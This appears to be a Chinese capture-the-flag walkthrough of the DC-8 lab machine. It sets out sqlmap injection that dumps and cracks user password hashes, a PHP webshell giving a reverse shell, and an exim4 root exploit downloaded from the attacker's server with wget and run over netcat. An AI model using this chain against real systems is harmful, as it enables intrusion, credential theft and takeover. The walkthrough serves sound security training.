一:資訊收集
1:主機發現
arp-scan -I eth0 10.9.23.0/24
靶機ip
10.9.23.74
2:埠掃描
nmap -A -p- -T4 10.9.23.74
3:埠探測
4: 目錄遍歷
dirb http://10.9.23.74
http://10.9.23.74/robots.txt
發現有登入介面地址,訪問一下:
/?q=user/login/
發現可能存在sql注入
二:滲透測試
1:漏洞利用
試試sql注入:
sqlmap -u "http://10.9.23.74/?nid=1" --batch
發現可以注入,檢視下資料庫:
sqlmap -u "http://10.9.23.74/?nid=1" -dbs --batch
爆出d7db資料庫的表:
sqlmap -u "http://10.9.23.74/?nid=1" -D d7db --tables --batch
發現users表,爆出usesr表的列:
sqlmap -u "http://10.9.23.74/?nid=1" -D d7db -T users --columns --batch
發現name和pass,檢視欄位:
sqlmap -u "http://10.9.23.74/?nid=1" -D d7db -T users -C name,pass --dump --batch
發現兩個使用者,將兩個pass欄位放入john中進行破解:
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
使用者
admin
john
$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF
曝出密碼
turtle
2:登入系統嘗試反彈shell
john使用者登入成功
這個介面可以寫入php程式碼,新增一句話木馬
成功反彈
三:提權
升級shell
python -c 'import pty;pty.spawn("/bin/bash")';
檢視是否有特殊執行的檔案
find / -perm -u=s -type f 2>/dev/null
檢視exim4的版本:
/usr/sbin/exim4 --version
查詢exim4的漏洞:
發現和dc4提權的步驟一樣
存在本地提權
發現46996.sh指令碼可以提權,將其傳送到DC-8中
開啟80埠
python3 -m http.server 80
wget http://10.9.23.112/46996.sh
檔案結束符有錯誤,將其替換並進行提權:
sed -i -e 's/\r$//' 46996.sh
./46996.sh -m netcat
靶機結束